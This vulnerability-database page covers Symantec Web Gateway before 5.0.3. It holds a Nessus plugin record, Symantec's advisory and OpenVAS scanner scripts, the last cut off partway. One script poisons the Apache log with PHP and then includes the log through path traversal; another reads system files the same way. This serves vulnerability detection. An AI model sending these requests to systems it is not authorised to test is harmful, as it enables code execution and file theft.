Description
According to its self-reported version number, the remote web server is hosting Symantec Web Gateway before version 5.0.3, which has the following vulnerabilities:
- There are multiple cross-site scripting vulnerabilities. (CVE-2012-0296)
- Multiple shell command injection and local file inclusion vulnerabilities exist that could lead to arbitrary code execution. (CVE-2012-0297)
- Unauthenticated users are allowed to read/delete arbitrary files as root. (CVE-2012-0298)
- A file upload vulnerability exists that could lead to arbitrary code execution. (CVE-2012-0299)
A remote, unauthenticated attacker could exploit the code execution vulnerabilities to execute commands as the apache user. After exploitation, obtaining a root shell is trivial.
Related
{"id": "SYMANTEC_WEB_GATEWAY_SYM12-006.NASL", "vendorId": null, "type": "nessus", "bulletinFamily": "scanner", "title": "Symantec Web Gateway < 5.0.3 Multiple Vulnerabilities (SYM12-006) (version check)", "description": "According to its self-reported version number, the remote web server is hosting Symantec Web Gateway before version 5.0.3, which has the following vulnerabilities :\n\n -There are multiple cross-site scripting vulnerabilities.\n (CVE-2012-0296)\n\n - Multiple shell command injection and local file inclusion vulnerabilities exist that could lead to arbitrary code execution. (CVE-2012-0297)\n\n - Unauthenticated users are allowed to read/delete arbitrary files as root. (CVE-2012-0298)\n\n - A file upload vulnerability exists that could lead to arbitrary code execution. (CVE-2012-0299)\n\nA remote, unauthenticated attacker could exploit the code execution vulnerabilities to execute commands as the apache user. After exploitation, obtaining a root shell is trivial.", "published": "2012-05-21T00:00:00", "modified": "2021-01-19T00:00:00", "epss": [{"cve": "CVE-2012-0296", "epss": 0.66353, "percentile": 0.97602, "modified": "2023-12-03"}, {"cve": "CVE-2012-0297", "epss": 0.97408, "percentile": 0.99911, "modified": "2023-12-03"}, {"cve": "CVE-2012-0298", "epss": 0.00307, "percentile": 0.66472, "modified": "2023-12-03"}, {"cve": "CVE-2012-0299", "epss": 0.97125, "percentile": 0.99736, "modified": "2023-12-03"}], "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://www.tenable.com/plugins/nessus/59209", "reporter": "This script is Copyright (C) 2012-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.", "references": ["https://www.securityfocus.com/archive/1/523065/30/0/threaded", "https://www.securityfocus.com/archive/1/523064/30/0/threaded", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0296", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0298", "https://www.tenable.com/security/research/tra-2012-03", "https://www.zerodayinitiative.com/advisories/ZDI-12-091/", "http://www.nessus.org/u?5b5929ae", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0299", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0297", "https://www.zerodayinitiative.com/advisories/ZDI-12-090/"], "cvelist": ["CVE-2012-0296", "CVE-2012-0297", "CVE-2012-0298", "CVE-2012-0299"], "immutableFields": [], "lastseen": "2023-12-02T14:43:26", "viewCount": 14, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:B3B3DA42-859E-48BF-B67E-3A4E5F266E97", "AKB:E371A741-0446-47E4-97E5-21715E5EA84A"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2012-293", "CPAI-2012-311", "CPAI-2012-824"]}, {"type": "cve", "idList": ["CVE-2012-0296", "CVE-2012-0297", "CVE-2012-0298", "CVE-2012-0299"]}, {"type": "d2", "idList": ["D2SEC_SYMWEBGW"]}, {"type": "dsquare", "idList": ["E-158", "E-163", "E-82"]}, {"type": "exploitdb", "idList": ["EDB-ID:19406"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:9A23BC40C97079E951A8BC4B95B92342"]}, {"type": "nessus", "idList": ["SYMANTEC_WEB_GATEWAY_IPCHANGE_RCE.NASL", "SYMANTEC_WEB_GATEWAY_TIMER_XSS.NASL", "SYMANTEC_WEB_GATEWAY_UPLOAD_FILE_RCE.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310103484", "OPENVAS:1361412562310103489", "OPENVAS:1361412562310802632"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:113050", "PACKETSTORM:113090", "PACKETSTORM:113485", "PACKETSTORM:113486", "PACKETSTORM:114231"]}, {"type": "prion", "idList": ["PRION:CVE-2012-0296", "PRION:CVE-2012-0297", "PRION:CVE-2012-0298", "PRION:CVE-2012-0299"]}, {"type": "saint", "idList": 
["SAINT:09723FE34C900B59CB593CFB790946C5", "SAINT:0D475EE538584A09C093C3CE051B9477", "SAINT:79AF1DDEAA9DAE2B17DA10C8A568E698", "SAINT:CA79171627977B6EB496110895555ECA"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:28147", "SECURITYVULNS:DOC:28148", "SECURITYVULNS:VULN:12416"]}, {"type": "seebug", "idList": ["SSV:73332"]}, {"type": "symantec", "idList": ["SMNTC-1250"]}, {"type": "zdi", "idList": ["ZDI-12-090", "ZDI-12-091"]}]}, "score": {"value": 0.3, "vector": "NONE"}, "backreferences": {"references": [{"type": "checkpoint_advisories", "idList": ["CPAI-2012-293", "CPAI-2012-311", "CPAI-2012-824"]}, {"type": "cve", "idList": ["CVE-2012-0296", "CVE-2012-0297", "CVE-2012-0298", "CVE-2012-0299"]}, {"type": "dsquare", "idList": ["E-82"]}, {"type": "exploitdb", "idList": ["EDB-ID:19406"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/LINUX/HTTP/SYMANTEC_WEB_GATEWAY_EXEC", "MSF:EXPLOIT/LINUX/HTTP/SYMANTEC_WEB_GATEWAY_FILE_UPLOAD", "MSF:EXPLOIT/LINUX/HTTP/SYMANTEC_WEB_GATEWAY_LFI"]}, {"type": "nessus", "idList": ["SYMANTEC_WEB_GATEWAY_TIMER_XSS.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310103489"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:113486"]}, {"type": "saint", "idList": ["SAINT:CA79171627977B6EB496110895555ECA"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:28148"]}, {"type": "seebug", "idList": ["SSV:73332"]}, {"type": "zdi", "idList": ["ZDI-12-091"]}]}, "exploitation": null, "epss": [{"cve": "CVE-2012-0296", "epss": 0.85025, "percentile": 0.97973, "modified": "2023-05-06"}, {"cve": "CVE-2012-0297", "epss": 0.97447, "percentile": 0.99907, "modified": "2023-05-06"}, {"cve": "CVE-2012-0298", "epss": 0.00436, "percentile": 0.70936, "modified": "2023-05-06"}, {"cve": "CVE-2012-0299", "epss": 0.97198, "percentile": 0.99681, "modified": "2023-05-06"}], "vulnersScore": 0.3}, "_state": {"dependencies": 1701636640, "score": 1701635924, "epss": 0}, "_internal": {"score_hash": "57ee1a8307227d9003ed419fb62249dc"}, "pluginID": 
"59209", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\n\nif (description)\n{\n script_id(59209);\n script_version(\"1.25\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\n \"CVE-2012-0296\",\n \"CVE-2012-0297\",\n \"CVE-2012-0298\",\n \"CVE-2012-0299\"\n );\n script_bugtraq_id(\n 53396,\n 53442,\n 53443,\n 53444\n );\n script_xref(name:\"TRA\", value:\"TRA-2012-03\");\n script_xref(name:\"EDB-ID\", value:\"18832\");\n script_xref(name:\"EDB-ID\", value:\"18932\");\n script_xref(name:\"EDB-ID\", value:\"18942\");\n script_xref(name:\"EDB-ID\", value:\"19065\");\n script_xref(name:\"EDB-ID\", value:\"19406\");\n\n script_name(english:\"Symantec Web Gateway < 5.0.3 Multiple Vulnerabilities (SYM12-006) (version check)\");\n script_summary(english:\"Checks SWG version\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A web security application hosted on the remote web server has\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version number, the remote web server\nis hosting Symantec Web Gateway before version 5.0.3, which has the\nfollowing vulnerabilities :\n\n -There are multiple cross-site scripting vulnerabilities.\n (CVE-2012-0296)\n\n - Multiple shell command injection and local file inclusion\n vulnerabilities exist that could lead to arbitrary code\n execution. (CVE-2012-0297)\n\n - Unauthenticated users are allowed to read/delete arbitrary\n files as root. (CVE-2012-0298)\n\n - A file upload vulnerability exists that could lead to\n arbitrary code execution. (CVE-2012-0299)\n\nA remote, unauthenticated attacker could exploit the code execution\nvulnerabilities to execute commands as the apache user. 
After\nexploitation, obtaining a root shell is trivial.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.tenable.com/security/research/tra-2012-03\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.zerodayinitiative.com/advisories/ZDI-12-090/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.zerodayinitiative.com/advisories/ZDI-12-091/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.securityfocus.com/archive/1/523064/30/0/threaded\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.securityfocus.com/archive/1/523065/30/0/threaded\");\n # https://support.symantec.com/en_US/article.SYMSA1250.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?5b5929ae\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Symantec Web Gateway version 5.0.3 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Symantec Web Gateway 5.0.2 File Upload\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Symantec Web Gateway 5.0.2.8 Arbitrary PHP File Upload Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'D2ExploitPack');\n script_cwe_id(20, 74, 79, 442, 629, 711, 712, 722, 725, 750, 751, 
800, 801, 809, 811, 864, 900, 928, 931, 990);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/05/04\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/05/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/05/21\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:symantec:web_gateway\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2012-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"symantec_web_gateway_detect.nasl\");\n script_require_keys(\"www/symantec_web_gateway\");\n script_require_ports(\"Services/www\", 443);\n\n exit(0);\n}\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"webapp_func.inc\");\ninclude(\"audit.inc\");\n\nport = get_http_port(default:443, php:TRUE);\ninstall = get_install_from_kb(appname:'symantec_web_gateway', port:port, exit_on_fail:TRUE);\ndir = install['dir'];\nver = install['ver'];\nfix = '5.0.3';\n\nurl = build_url(port:port, qs:dir);\n\nif (ver == UNKNOWN_VER)\n audit(AUDIT_UNKNOWN_WEB_APP_VER, 'Symantec Web Gateway', url);\n\nif (ver =~ '^5' && ver_compare(ver:ver, fix:fix, strict:FALSE) < 0)\n{\n set_kb_item(name:'www/' + port + '/XSS', value:TRUE);\n\n if (report_verbosity > 0)\n {\n report =\n '\\n URL : ' + url +\n '\\n Installed version : ' + ver +\n '\\n Fixed version : ' + fix + '\\n';\n security_hole(port:port, extra:report);\n }\n else security_hole(port);\n}\nelse audit(AUDIT_WEB_APP_NOT_AFFECTED, 'Symantec Web Gateway', url, ver);\n\n", "naslFamily": "CGI abuses", "cpe": ["cpe:/a:symantec:web_gateway"], "solution": "Upgrade to Symantec Web Gateway version 5.0.3 or later.", "nessusSeverity": "Critical", "cvssScoreSource": "", "vendor_cvss2": {"score": 
10, "vector": "CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "vendor_cvss3": {"score": null, "vector": null}, "vpr": {"risk factor": "High", "score": "8.9"}, "exploitAvailable": true, "exploitEase": "No exploit is required", "patchPublicationDate": "2012-05-17T00:00:00", "vulnerabilityPublicationDate": "2012-05-04T00:00:00", "exploitableWith": ["Core Impact", "Elliot(Symantec Web Gateway 5.0.2 File Upload)", "CANVAS(D2ExploitPack)", "Metasploit(Symantec Web Gateway 5.0.2.8 Arbitrary PHP File Upload Vulnerability)"]}
{"symantec": [{"lastseen": "2021-11-07T10:51:43", "description": "### SUMMARY\n\n \n\nSymantec's Web Gateway management GUI is susceptible to file include command injection/execution, file upload/execution and file download/deletion security issues. The management GUI is also susceptible to cross-site scripting (XSS). Successful exploitation could result in execution of arbitrary code in the context of the application, denial of service through deletion of arbitrary system files, and unauthorized access to users' data or to unauthorized network information.\n\n### AFFECTED PRODUCTS\n\n \n\n**Product**\n\n| \n\n**Version**\n\n| \n\n**Solution** \n \n---|---|--- \n \nSymantec Web Gateway\n\n| \n\n5.0.x\n\n| \n\nSymantec Web Gateway 5.0.3 \n \n### ISSUES\n\n \n\n**CVSS2**\n\n**Base Score**\n\n| \n\n**Impact**\n\n| \n\n**Exploitability**\n\n| \n\n**CVSS2 Vector** \n \n---|---|---|--- \n \n**Command injection code execution - High** \n \n8.33\n\n| \n\n**10.0**\n\n| \n\n**6.45**\n\n| \n\nAV:A/AC:L/Au:N/C:C/I:C/A:C\n\n \n \n**File include/command execution - High** \n \n7.77\n\n| \n\n**9.2**\n\n| \n\n**4.65**\n\n| \n\nAV:A/AC:L/Au:N/C:C/I:C/A:N\n\n \n \n**File download/deletion- Medium** \n \n6.1\n\n| \n\n**6.9**\n\n| \n\n**6.5**\n\n| \n\nAV:A/AC:L/Au:N/C:N/I:N/A:C \n \n**Cross-site scripting - Medium** \n \n4.33\n\n| \n\n**4.93**\n\n| \n\n**5.54**\n\n| \n\nAV:A/AC:M/Au:N/C:P/I:P/A:N \n \n \n\nBID 53444 to the file include/command execution issues\n\nBID 53442 to the file download/deletion issues\n\nBID 53443 to the file upload/OS command execution issue\n\nBID 53396 to the XSS issues\n\nCVE-2012-0297 to the file include/command execution issues\n\nCVE-2012-0298 to the file download/deletion issues\n\nCVE-2012-0299 to the file upload/OS command execution issues\n\nCVE-2012-0296 to the XSS issues\n\n### MITIGATION\n\n \n\n**Details**\n\nSymantec was notified of multiple security issues impacting the management console of the Symantec Web Gateway Appliance. 
The management interface does not properly authenticate or filter external input. This could allow unauthorized access to user's session or network information. As a result of weak authentication and sanitization of user controlled input, arbitrary code could potentially be injected/included in application scripts used by the Symantec Web Gateway application potentially resulting in arbitrary command execution with application privileges. \n\nAdditionally, file management scripts in the Symantec Web Gateway interface do not properly filter user input, potentially resulting in an unauthenticated, unprivileged user downloading and deleting arbitrary files including essential operational files. This could render the targeted system unavailable or unusable depending on the success of such an attempt and files targeted. An unauthenticated, unprivileged user could also upload arbitrary code through the abuse of management scripts. A malicious user could be able to control the file name and location which could potentially result in arbitrary command execution with elevated privileges.\n\nCross-site scripting vulnerabilities were also reported in the Symantec Web Gateway Management Interface. Cross-site scripting is a trust exploitation generally requiring enticing a authenticated user to click on a malicious link. A successful exploitation, depending on the nature of the link, could potentially result in arbitrary java/html requests and scripts executed in the context of the targeted user.\n\nIn a normal installation, the Symantec Web Gateway management interface should not be accessible external to the network. However, an authorized but unprivileged network user or an external attacker able to leverage network access could attempt to exploit these weaknesses. \n\n \n\n**Symantec Response**\n\nSymantec engineers verified these issues and have released an update to address them. 
Symantec engineers reviewed related functionality to further enhance the overall security of Symantec Web Gateway. Symantec has released Symantec Web Gateway 5.0.3, currently available to customers through normal update channels.\n\nSymantec is not aware of any exploitation of, or adverse customer impact from these issues.\n\n \n**Best Practices**\n\nAs part of normal best practices, Symantec strongly recommends:\n\n * Restrict access to administration or management systems to privileged users.\n * Disable remote access or restrict it to trusted/authorized systems only.\n * Keep all operating systems and applications updated with the latest vendor patches.\n * Follow a multi-layered approach to security. Run both firewall and anti-malware applications, at a minimum, to provide multiple points of detection and protection to both inbound and outbound threats.\n * Deploy network and host-based intrusion detection systems to monitor network traffic for signs of anomalous or suspicious activity. 
This may aid in detection of attacks or malicious activity related to exploitation of latent vulnerabilities\n\n### ACKNOWLEDGEMENTS\n\n \n\nSymantec credits Tenable Network Security working through TippingPoint's [ZeroDay Initiative](<http://www.zerodayinitiative.com/>) for reporting file include, command injection/execution and file download/deletion and upload/execution issues.\n\n \n\nSymantec credits an anonymous contributor working with Beyond Security's SecuriTeam Secure Disclosure project ([http://www.beyondsecurity.com/ssd.html](<http://www.beyondsecurity.com/ssd.html>) for reporting file include, command injection/execution; file download/deletion and upload/execution issues.\n\n \n\nSymantec credits Ajay Pal Singh Atwal and an anonymous finder for reporting the cross-site scripting issues.\n\n### REFERENCES\n\n \n\n**BID:** Security Focus, [http://www.securityfocus.com](<http://www.securityfocus.com/>), has assigned the following Bugtraq IDs (BID) to these issues for inclusion in the Security Focus vulnerability database.\n\n**CVE:** These issues are candidates for inclusion in the CVE list ([http://cve.mitre.org](<http://cve.mitre.org/>)), which standardizes names for security problems. 
The following CVE IDs have been assigned.\n", "cvss3": {}, "published": "2012-05-17T08:00:00", "type": "symantec", "title": "Symantec Web Gateway Multiple Security Issues", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-0296", "CVE-2012-0297", "CVE-2012-0298", "CVE-2012-0299"], "modified": "2020-03-05T20:47:00", "id": "SMNTC-1250", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "openvas": [{"lastseen": "2020-05-12T17:30:48", "description": "This host is running Symantec Web Gateway and is prone to command\n execution vulnerability.", "cvss3": {}, "published": "2012-06-01T00:00:00", "type": "openvas", "title": "Symantec Web Gateway Remote Shell Command Execution Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-0297", "CVE-2012-0299"], "modified": "2020-05-08T00:00:00", "id": "OPENVAS:1361412562310802632", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310802632", "sourceData": "##############################################################################\n# OpenVAS Vulnerability Test\n#\n# Symantec Web Gateway Remote Shell Command Execution Vulnerability\n#\n# Authors:\n# Sooraj KS <kssooraj@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This 
program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:symantec:web_gateway\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.802632\");\n script_version(\"2020-05-08T08:34:44+0000\");\n script_bugtraq_id(53444, 53443);\n script_cve_id(\"CVE-2012-0297\", \"CVE-2012-0299\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-05-08 08:34:44 +0000 (Fri, 08 May 2020)\");\n script_tag(name:\"creation_date\", value:\"2012-06-01 12:12:12 +0530 (Fri, 01 Jun 2012)\");\n script_name(\"Symantec Web Gateway Remote Shell Command Execution Vulnerability\");\n script_category(ACT_ATTACK);\n script_copyright(\"Copyright (C) 2012 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_symantec_web_gateway_detect.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_mandatory_keys(\"symantec_web_gateway/installed\");\n\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/49216\");\n script_xref(name:\"URL\", value:\"http://www.exploit-db.com/exploits/18932\");\n script_xref(name:\"URL\", value:\"http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=2012&suid=20120517_00\");\n\n script_tag(name:\"impact\", value:\"Successful exploits will result in the execution of arbitrary attack supplied\n commands in the context of the 
affected application.\");\n\n script_tag(name:\"affected\", value:\"Symantec Web Gateway versions 5.0.x before 5.0.3\");\n\n script_tag(name:\"insight\", value:\"The flaw is due to an improper validation of certain unspecified\n input. This can be exploited to execute arbitrary code by injecting crafted\n data or including crafted data.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Symantec Web Gateway version 5.0.3 or later.\");\n\n script_tag(name:\"summary\", value:\"This host is running Symantec Web Gateway and is prone to command\n execution vulnerability.\");\n\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"http://www.symantec.com/business/web-gateway\");\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"host_details.inc\");\n\nif(!port = get_app_port(cpe:CPE)){\n exit(0);\n}\n\nif(!dir = get_app_location(cpe:CPE, port:port)){\n exit(0);\n}\n\nif(dir == \"/\") dir = \"\";\nexploit= 'GET ' + dir + '/<?php phpinfo();?> HTTP/1.1\\r\\n\\r\\n';\nres = http_send_recv(port:port, data:exploit);\n\nurl = dir + \"/spywall/releasenotes.php?relfile=../../../../../usr/local/apache2/logs/access_log\";\nreq = http_get(item:url, port:port);\nres = http_send_recv(port:port, data:req);\n\nif(res && res =~ \"^HTTP/1\\.[01] 200\" && \"<title>phpinfo()\" >< res && \"<title>Symantec Web Gateway\" >< res){\n report = http_report_vuln_url(port:port, url:url);\n security_message(port:port, data:report);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-05-12T17:30:40", "description": "This host is running Symantec Web Gateway and is prone to directory\n traversal vulnerability.", "cvss3": {}, "published": "2012-05-18T00:00:00", "type": "openvas", "title": "Symantec Web Gateway 'relfile' Parameter Directory Traversal Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": 
["CVE-2012-0298"], "modified": "2020-05-08T00:00:00", "id": "OPENVAS:1361412562310103489", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310103489", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Symantec Web Gateway 'relfile' Parameter Directory Traversal Vulnerability\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (C) 2012 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\nCPE = \"cpe:/a:symantec:web_gateway\";\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.103489\");\n script_bugtraq_id(53442);\n script_cve_id(\"CVE-2012-0298\");\n script_tag(name:\"cvss_base\", value:\"6.4\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:P\");\n script_version(\"2020-05-08T08:34:44+0000\");\n\n script_name(\"Symantec Web Gateway 'relfile' Parameter Directory Traversal Vulnerability\");\n\n script_tag(name:\"last_modification\", value:\"2020-05-08 08:34:44 +0000 (Fri, 08 May 2020)\");\n script_tag(name:\"creation_date\", value:\"2012-05-18 10:03:57 +0200 (Fri, 18 May 2012)\");\n script_category(ACT_ATTACK);\n script_tag(name:\"qod_type\", 
value:\"remote_vul\");\n script_family(\"Web application abuses\");\n script_copyright(\"Copyright (C) 2012 Greenbone Networks GmbH\");\n script_dependencies(\"gb_symantec_web_gateway_detect.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_mandatory_keys(\"symantec_web_gateway/installed\");\n script_tag(name:\"impact\", value:\"Successful exploitation could allow attackers to read arbitrary files via\n directory traversal attacks and gain sensitive information.\");\n script_tag(name:\"affected\", value:\"Symantec Web Gateway versions 5.0.x before 5.0.3\");\n script_tag(name:\"insight\", value:\"The flaw is due to an improper validation of user-supplied input\n passed via the 'relfile' parameter to the '/spywall/releasenotes.php',\n which allows attackers to read arbitrary files via a ../(dot dot) sequences.\");\n script_tag(name:\"solution\", value:\"Upgrade to Symantec Web Gateway version 5.0.3 or later.\");\n script_tag(name:\"summary\", value:\"This host is running Symantec Web Gateway and is prone to directory\n traversal vulnerability.\");\n script_xref(name:\"URL\", value:\"http://www.securityfocus.com/bid/53442\");\n script_xref(name:\"URL\", value:\"http://www.symantec.com/business/web-gateway\");\n script_xref(name:\"URL\", value:\"http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=2012&suid=20120517_00\");\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/49216\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"host_details.inc\");\ninclude(\"http_keepalive.inc\");\ninclude(\"misc_func.inc\");\n\nif(!port = get_app_port(cpe:CPE))exit(0);\nif(!dir = get_app_location(cpe:CPE, port:port))exit(0);\n\nfiles = traversal_files(\"linux\");\n\nforeach pattern(keys(files)) {\n\n file = files[pattern];\n\n url = string(dir, \"/spywall/releasenotes.php?relfile=../../../../../\" + files);\n\n 
if(http_vuln_check(port:port, url:url, pattern:pattern)) {\n report = http_report_vuln_url(port:port, url:url);\n security_message(data:report, port:port);\n exit(0);\n }\n}\n\nexit(99);\n", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:P"}}, {"lastseen": "2019-12-06T16:45:25", "description": "Symantec Web Gateway is prone to a cross-site scripting vulnerability\nbecause it fails to properly sanitize user-supplied input.", "cvss3": {}, "published": "2012-05-07T00:00:00", "type": "openvas", "title": "Symantec Web Gateway 'l' Parameter Cross Site Scripting Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-0296"], "modified": "2019-12-05T00:00:00", "id": "OPENVAS:1361412562310103484", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310103484", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Symantec Web Gateway 'l' Parameter Cross Site Scripting Vulnerability\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:symantec:web_gateway\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.103484\");\n script_bugtraq_id(53396);\n script_version(\"2019-12-05T15:10:00+0000\");\n script_cve_id(\"CVE-2012-0296\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n\n script_name(\"Symantec Web Gateway 'l' Parameter Cross Site Scripting Vulnerability\");\n\n script_xref(name:\"URL\", value:\"http://www.securityfocus.com/bid/53396\");\n script_xref(name:\"URL\", value:\"http://www.symantec.com/business/web-gateway\");\n script_xref(name:\"URL\", value:\"https://support.symantec.com/en_US/article.SYMSA1250.html\");\n\n script_tag(name:\"last_modification\", value:\"2019-12-05 15:10:00 +0000 (Thu, 05 Dec 2019)\");\n script_tag(name:\"creation_date\", value:\"2012-05-07 14:02:06 +0200 (Mon, 07 May 2012)\");\n script_category(ACT_ATTACK);\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n script_family(\"Web application abuses\");\n script_copyright(\"This script is Copyright (C) 2012 Greenbone Networks GmbH\");\n script_dependencies(\"gb_symantec_web_gateway_detect.nasl\");\n script_require_ports(\"Services/www\", 80);\n 